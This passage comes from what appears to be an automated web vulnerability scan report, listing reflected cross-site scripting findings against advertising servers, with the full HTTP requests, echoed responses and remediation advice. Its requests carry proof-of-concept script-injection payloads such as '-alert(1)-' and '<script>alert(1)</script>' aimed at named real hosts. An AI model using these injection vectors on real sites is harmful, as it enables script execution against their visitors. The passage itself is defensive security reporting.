Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ca413'-alert(1)-'23a95e8eafa was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.seattlepostintelligencer/be_home;sz=ca413'-alert(1)-'23a95e8eafa HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7347
Date: Sat, 17 Sep 2011 16:48:05 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='121773f9380f32f';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
ollectiveMedia.createAndAttachAd("q1-30517831260_1316278085","http://ad.doubleclick.net/adj/q1.q.seattlepostintelligencer/be_home;net=q1;u=,q1-30517831260_1316278085,121773f9380f32f,none,;;cmw=nurl;sz=ca413'-alert(1)-'23a95e8eafa;contx=none;dc=s;btg=?","ca413'-alert(1)-'23a95e8eafa","",true);</scr'+'ipt>
...[SNIP]...

4.25. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/home [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.seattlepostintelligencer/home

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload baef0'-alert(1)-'39cff7264f0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadjbaef0'-alert(1)-'39cff7264f0/q1.q.seattlepostintelligencer/home;sz=728x90;net=q1;ord=3639010052;ord1=105623;cmpgurl=http%253A//www.seattlepi.com/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7332
Date: Sat, 17 Sep 2011 16:49:32 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30219105289_1316278172","http://ad.doubleclick.net/adjbaef0'-alert(1)-'39cff7264f0/q1.q.seattlepostintelligencer/home;net=q1;u=,q1-30219105289_1316278172,,polit,;;cmw=owl;sz=728x90;net=q1;ord1=105623;contx=polit;dc=s;btg=;ord=3639010052?","728","90",true);</scr'+'ipt>
...[SNIP]...

4.26. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/home [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.seattlepostintelligencer/home

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 76532'-alert(1)-'8e8c22c30a1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.seattlepostintelligencer76532'-alert(1)-'8e8c22c30a1/home;sz=728x90;net=q1;ord=3639010052;ord1=105623;cmpgurl=http%253A//www.seattlepi.com/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7332
Date: Sat, 17 Sep 2011 16:49:32 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30202844826_1316278172","http://ad.doubleclick.net/adj/q1.q.seattlepostintelligencer76532'-alert(1)-'8e8c22c30a1/home;net=q1;u=,q1-30202844826_1316278172,,polit,;;cmw=owl;sz=728x90;net=q1;ord1=105623;contx=polit;dc=s;btg=;ord=3639010052?","728","90",true);</scr'+'ipt>
...[SNIP]...

4.27. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/home [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.seattlepostintelligencer/home

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b257'-alert(1)-'8e4facbf4cf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.seattlepostintelligencer/home7b257'-alert(1)-'8e4facbf4cf;sz=728x90;net=q1;ord=3639010052;ord1=105623;cmpgurl=http%253A//www.seattlepi.com/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7332
Date: Sat, 17 Sep 2011 16:49:33 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30301510334_1316278173","http://ad.doubleclick.net/adj/q1.q.seattlepostintelligencer/home7b257'-alert(1)-'8e4facbf4cf;net=q1;u=,q1-30301510334_1316278173,,polit,;;cmw=owl;sz=728x90;net=q1;ord1=105623;contx=polit;dc=s;btg=;ord=3639010052?","728","90",true);</scr'+'ipt>
...[SNIP]...

4.28. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/home [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.seattlepostintelligencer/home

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5f849'-alert(1)-'1da09993cbd was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.seattlepostintelligencer/home;sz=5f849'-alert(1)-'1da09993cbd HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc%5D%5D%3E%3E

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7314
Date: Sat, 17 Sep 2011 16:49:27 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps
...[SNIP]...
age="Javascript">CollectiveMedia.createAndAttachAd("q1-30313547426_1316278167","http://ad.doubleclick.net/adj/q1.q.seattlepostintelligencer/home;net=q1;u=,q1-30313547426_1316278167,,none,;;cmw=nurl;sz=5f849'-alert(1)-'1da09993cbd;contx=none;dc=s;btg=?","5f849'-alert(1)-'1da09993cbd","",true);</scr'+'ipt>
...[SNIP]...

4.29. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/qo [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.seattlepostintelligencer/qo

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54ba1'-alert(1)-'e8903b7b342 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj54ba1'-alert(1)-'e8903b7b342/q1.q.seattlepostintelligencer/qo;sz=300x250;net=q1;ord=[timestamp];ord1=841037;cmpgurl=http%253A//www.seattlepi.com/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7363
Date: Sat, 17 Sep 2011 16:23:43 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='1229bf517f8af24';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30509901420_1316276623","http://ad.doubleclick.net/adj54ba1'-alert(1)-'e8903b7b342/q1.q.seattlepostintelligencer/qo;net=q1;u=,q1-30509901420_1316276623,1229bf517f8af24,polit,;;cmw=owl;sz=300x250;net=q1;ord1=841037;contx=polit;dc=s;btg=;ord=[timestamp]?","300","250",true);</scr'+'ipt
...[SNIP]...

4.30. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/qo [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.seattlepostintelligencer/qo

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 400ca'-alert(1)-'bb299063a32 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.seattlepostintelligencer400ca'-alert(1)-'bb299063a32/qo;sz=300x250;net=q1;ord=[timestamp];ord1=841037;cmpgurl=http%253A//www.seattlepi.com/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7363
Date: Sat, 17 Sep 2011 16:23:45 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='1229bf517f8af24';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30217030312_1316276625","http://ad.doubleclick.net/adj/q1.q.seattlepostintelligencer400ca'-alert(1)-'bb299063a32/qo;net=q1;u=,q1-30217030312_1316276625,1229bf517f8af24,polit,;;cmw=owl;sz=300x250;net=q1;ord1=841037;contx=polit;dc=s;btg=;ord=[timestamp]?","300","250",true);</scr'+'ipt>
...[SNIP]...

4.31. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/qo [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.seattlepostintelligencer/qo

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6da30'-alert(1)-'f578bbc5ef0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.seattlepostintelligencer/qo6da30'-alert(1)-'f578bbc5ef0;sz=300x250;net=q1;ord=[timestamp];ord1=841037;cmpgurl=http%253A//www.seattlepi.com/? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/1.0.5
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7363
Date: Sat, 17 Sep 2011 16:23:45 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='1229bf517f8af24';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("q1-30405826374_1316276625","http://ad.doubleclick.net/adj/q1.q.seattlepostintelligencer/qo6da30'-alert(1)-'f578bbc5ef0;net=q1;u=,q1-30405826374_1316276625,1229bf517f8af24,polit,;;cmw=owl;sz=300x250;net=q1;ord1=841037;contx=polit;dc=s;btg=;ord=[timestamp]?","300","250",true);</scr'+'ipt>
...[SNIP]...

4.32. http://a.collective-media.net/cmadj/q1.q.seattlepostintelligencer/qo [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /cmadj/q1.q.seattlepostintelligencer/qo

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 91f0f'-alert(1)-'443691ddcbd was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cmadj/q1.q.seattlepostintelligencer/qo;sz=91f0f'-alert(1)-'443691ddcbd HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Content-Length: 7342
Date: Sat, 17 Sep 2011 16:23:40 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cid='1229bf517f8af24';function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._i
...[SNIP]...
pt">CollectiveMedia.createAndAttachAd("q1-30108446215_1316276620","http://ad.doubleclick.net/adj/q1.q.seattlepostintelligencer/qo;net=q1;u=,q1-30108446215_1316276620,1229bf517f8af24,none,;;cmw=nurl;sz=91f0f'-alert(1)-'443691ddcbd;contx=none;dc=s;btg=?","91f0f'-alert(1)-'443691ddcbd","",true);</scr'+'ipt>
...[SNIP]...

4.33. http://ad.agkn.com/iframe!t=1089! [clk1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1089!

Issue detail

The value of the clk1 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2898"%3balert(1)//fa66136d678 was submitted in the clk1 parameter. This input was echoed as e2898";alert(1)//fa66136d678 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /iframe!t=1089!?ct=US&st=TX&ac=214&zp=75207&bw=4&dma=102&city=13290&che=3807892&clk1=http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/3/0/%2a/u%3B245108818%3B0-0%3B0%3B69151653%3B3454-728/90%3B43624044/43641831/1%3B%3B%7Eokv%3D%3Bpc%3DDFP244754359%3B%3B%7Eaopt%3D0/ff/34/ff%3B%7Efdr%3D244754359%3B0-0%3B0%3B18485482%3B3454-728/90%3B43698008/43715795/1%3B%3B%7Eokv%3D%3Bsite%3Danswerology%3Bcat%3Dother%3Bdemo%3Dadult%3Btile%3D1%3Bsect%3Danswerology%3Bdcopt%3Dist%3Bsz%3D728x90%3Brsi%3D%3B%7Eaopt%3D2/0/34/0%3B%7Esscs%3D%3fe2898"%3balert(1)//fa66136d678 HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/index.aspx?template=ads.ascx&topic=other&tile=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=184471637933354914; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Thu, 15-Sep-2016 16:43:48 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIWB4rEAAAAAGwBArgBASUYDSgBUAANKQFgAA0qASAADSsBUAANLAFQAA0tATAADS4BUAANLwFwAA0lAUAADSYBQAANJwFAAA05AWAADTgBcAANOwGAAA06AUAADTwBMAANMQEwAA0wARAADTMBYAANMgFAAA01ARAADTQBQAANNwFwAA02AVAABQEgAQCAASEBAIABJgEAgAEfAQCAAR4BAIABArh%2BNmC3IYoKl9sAAAAAAAADCQAAAAAAAA03AAAAAAAAASUCSgAA; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Mon, 16-Sep-2013 16:43:48 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:43:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
4359;;~aopt=0/ff/34/ff;~fdr=244754359;0-0;0;18485482;3454-728/90;43698008/43715795/1;;~okv=;site=answerology;cat=other;demo=adult;tile=1;sect=answerology;dcopt=ist;sz=728x90;rsi=;~aopt=2/0/34/0;~sscs=?e2898";alert(1)//fa66136d678http://ad.agkn.com/interaction!che=253133449?imid=3918333030490085339&ipid=777&caid=696&cgid=293&crid=3383&a=CLICK&adid=586&status=0&l=http://www.pantene.com/en-US/hair-care-collections/restore-beautif
...[SNIP]...

4.34. http://ad.agkn.com/iframe!t=1089! [clk1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1089!

Issue detail

The value of the clk1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99ad9"><script>alert(1)</script>435adb126ae was submitted in the clk1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe!t=1089!?ct=US&st=TX&ac=214&zp=75207&bw=4&dma=102&city=13290&che=3807892&clk1=http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/3/0/%2a/u%3B245108818%3B0-0%3B0%3B69151653%3B3454-728/90%3B43624044/43641831/1%3B%3B%7Eokv%3D%3Bpc%3DDFP244754359%3B%3B%7Eaopt%3D0/ff/34/ff%3B%7Efdr%3D244754359%3B0-0%3B0%3B18485482%3B3454-728/90%3B43698008/43715795/1%3B%3B%7Eokv%3D%3Bsite%3Danswerology%3Bcat%3Dother%3Bdemo%3Dadult%3Btile%3D1%3Bsect%3Danswerology%3Bdcopt%3Dist%3Bsz%3D728x90%3Brsi%3D%3B%7Eaopt%3D2/0/34/0%3B%7Esscs%3D%3f99ad9"><script>alert(1)</script>435adb126ae HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/index.aspx?template=ads.ascx&topic=other&tile=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=184471637933354914; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Thu, 15-Sep-2016 16:43:47 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIWB4rDAAAAAGoBArgBASUYDSgBUAANKQFgAA0qASAADSsBUAANLAFAAA0tATAADS4BUAANLwFwAA0lAUAADSYBQAANJwFAAA05AWAADTgBcAANOwGAAA06AUAADTwBMAANMQEwAA0wARAADTMBYAANMgFAAA01ARAADTQBQAANNwFgAA02AVAABQEgAQCAASEBAIABJgEAgAEfAQCAAR4BAIABArh%2BIc9vMfB8Iq8AAAAAAAADCQAAAAAAAA08AAAAAAAAASUCSgAA; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Mon, 16-Sep-2013 16:43:47 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:43:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
4359;;~aopt=0/ff/34/ff;~fdr=244754359;0-0;0;18485482;3454-728/90;43698008/43715795/1;;~okv=;site=answerology;cat=other;demo=adult;tile=1;sect=answerology;dcopt=ist;sz=728x90;rsi=;~aopt=2/0/34/0;~sscs=?99ad9"><script>alert(1)</script>435adb126aehttp://ad.agkn.com/interaction!che=472696441?imid=2436288183709475503&ipid=777&caid=696&cgid=293&crid=3388&a=CLICK&adid=586&status=0&l=http://www.pantene.com/en-US/hair-care-collections/restore-beautif
...[SNIP]...

4.35. http://ad.agkn.com/iframe!t=1089! [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1089!

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66d9b"><script>alert(1)</script>33d30fc9f77 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

